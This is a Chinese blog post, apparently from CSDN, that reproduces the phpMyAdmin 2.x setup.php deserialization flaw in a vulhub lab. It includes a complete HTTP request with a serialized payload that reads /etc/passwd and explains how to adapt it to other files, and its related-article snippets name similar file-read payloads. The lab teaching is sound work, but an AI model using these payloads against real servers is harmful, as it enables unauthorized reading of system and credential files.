phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)(Kali)

已于 2022-05-01 22:00:22 修改
阅读量465 收藏
点赞数 1
分类专栏: kali 文章标签: 安全
于 2022-05-01 16:48:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58262663/article/details/124528699
版权

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

通过vulhub靶场进行复现操作

1.首先搭建靶场环境(采用Kali)

cd vulhub/phpmyadmin/WooYun-2016-199433  //进入对应漏洞目录,具体参照vulhub.org

sudo docker-compose build           //编译相对应环境           

sudo docker-compose -up -d         //搭建靶场环境

搭建成功

环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。

看到此页面则靶场搭建成功

 利用Kali自带的BurpSuite进行抓包

 全选发送到Repeater

发送如下数据包,即可读取/etc/passwd

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

 如图所示,再点击send即可发送数据包

 (最为重要的内容)注意:红框部分,s:11:"/etc/passwd"   表示变量类型:变量数量:变量内容

若要变为其他文件,则需要改变相应位置的类型、数量、内容

如/etc/passwd一共是11个字符

反序列化具体参照

简单了解反序列化 - upstream_yu - 博客园 (cnblogs.com)

 点击send之后就会返回数据了

 总结:漏洞操作简单易懂,主要涉及BurpSuite相关操作,适合新手体验

别忘记关闭靶场环境噢

sudo docker-compose down

GK_Szero
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug,使注入的代码可远程执行.
Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
黑白的博客
12-14 331
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
WooYun-2016-199433 phpmyadmin 序列漏洞
weixin_51387754的博客
12-08 355
漏洞简介 phpmyadmin 2.x版本中存在一处序列漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
Phpmyadmin Scripts / setup.php序列漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 401
Phpmyadmin Scripts / setup.php序列漏洞WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处序列漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
WooYun-2016-199433 phpmyadmin序列漏洞复现
丶没胡子的猫
01-25 953
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测漏洞利用漏洞加固 漏洞描述    影响版本 phpMyAdmin 2.x版本 漏洞环境搭建 漏洞分析 漏洞检测 漏洞利用 漏洞加固
[Vulhub](WooYun-2016-199433)phpmyadmin序列漏洞
weixin_45605352的博客
04-25 786
0x01 预备知识 什么是序列 序列 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或序列对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转为字符串,方便保存到数据库或者文件中 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是序列
phpmyadmin安装时提示:Warning: require_once(./libraries/common.inc.php)错误解决办法
10-28
common.inc.php这个文件是存在的,而且系统中php也不装在C盘根目录下,怎么会有这样的提示呢?经过一阵调试终于发现解决方法
其他类别phpMyAdmin 3.2.2.0 Final For Windows-phpmyadmin-3.2.2.rar
04-09
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
phpMyAdmin-4.4.15.10-all-languages安装包
12-02
phpMyAdmin-4.4.15.10-all-languagesDBMS•在Server01上完成MariaDB数据库的安装,添加数据库root用户密码为Chinaskill22!•安装MariaDB 数据库服务器组件;•MariaDB数据库管理员信息:User: root/ Password: ...
PhpMyAdmin出现export.php Missing parameter: what /export_type错误解决方法
12-19
PhpMyAdmin 不能导出数据的问题,点击导出后先是一个请求失败或者白页,重新刷新后就报错 export.php: Missing parameter: what (FAQ 2.8) export.php: Missing parameter: export_type (FAQ 2.8) 解决方法是: php...
第三方应用漏洞phpmyadmin scripts/setup.php 序列
qq_39756628的博客
04-26 645
漏洞简介 phpmyadmin 2.x版本中存在一处序列漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。虽然是很老的漏洞,但在内网大部分都是用着老版本,在外网存在的也为数不少。 影响版本:已知版本为 2.8.0.3、2.8.04 启动环境 cd /root/vulhub/phpmyadmin/WooYun-2016-199433 docker-compose up -d 环境启动后,直接在浏览器中访问http://192.168.0.107:8080,即可看到phpmyadmin的首页。因为没
Vulhub靶场-phpmyadmin scripts/setup.php 序列漏洞WooYun-2016-199433)
最新发布
Grace_for_it的博客
05-03 442
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
phpmyadmin scripts/setup.php 序列漏洞
千寻的博客
03-21 1686
序列 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或序列对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列就是将对象的状态信息转为字符串储存起来那么序列就是再将这个。
phpmyadmin/scripts/setup.php,phpMyAdmin setup.php文件跨站脚本执行漏洞
weixin_39573512的博客
03-20 202
BugCVE: CVE-2008-3456,CVE-2008-3457BUGTRAQ: 30420phpMyAdminscripts/setup.php文件中show_overview ($title, $list, $buttons = '')函数没有正确地过滤685行echo $val[1]输入参数便返回给了用户,如果用户受骗跟随了恶意链接的话就会导致在用户浏览器会话中执行任意HTML和脚本...
Phpmyadmin 2.X 序列漏洞WooYun-2016-199433)
jammny
11-28 1194
一、漏洞简介 phpmyadmin 2.x版本中存在一处序列漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 二、漏洞影响 phpmyadmin 2.x 三、漏洞分析 https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ 四、漏洞利用 访问漏洞存在页面,并用bp进行抓包 更改请求为post并添加如下payload后发送,即可读取/etc/passwd: action=jammny&configurati.
phpmyadmin/scripts/setup.php,关于phpmyadmin2.8及以后版本的安装
weixin_29584723的博客
03-20 249
关于phpmyadmin2.8及以后版本的安装2021-01-21 2:01:16840解压缩后放到网站根目录下跟以前的版本一样。但是新增一个scripts/setup把我给弄糊涂了下面是转载的一个台湾人的blog以下是引用片段:這幾天phpmyadmin出了新版2.8.0.1,版號算是又往前邁進了一步,於是找了個時間換了一下這個新版。如果整件事情只有這樣的話,那也沒什麼好講的啦!就是因為過程中有...
phpmyadmin/scripts/setup.php,Linux下phpMyAdmin安装过程中的问题解决
weixin_29085865的博客
03-20 216
1.下载phpMyAdmin,自己想办法拷到/var/www/html下,并解压,开始使用。http://IP/phpMyAdmin测试cp config.sample.inc.php config/config.inc.phpchmod o+w config/config.inc.php2.遇到问题一,phpMyAdmin无法载入MySql扩展,笔者解决方法为yum -y install php...
php中%3cpre%3e有什么用,phpMyAdmin setup.php脚本PHP代码注入漏洞
weixin_34168834的博客
03-10 590
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit#!/bin/bash# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11# by pagvac (gnucitizen.org), 4th June 2009.# spec...
我的后台服务为什么会有 /phpMyAdmin-2.10.3/scripts/setup.php的访问记录
06-09
这可能是因为您的服务器安装了 phpMyAdmin,而 /phpMyAdmin-2.10.3/scripts/setup.phpphpMyAdmin 的一部分。setup.php 是用于安装和配置 phpMyAdmin 的脚本,因此如果有关于它的访问记录,可能是有人试图在您的服务器上安装或配置 phpMyAdmin。建议您检查服务器的安全性,并确保只有授权的用户可以访问和修改 phpMyAdmin

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值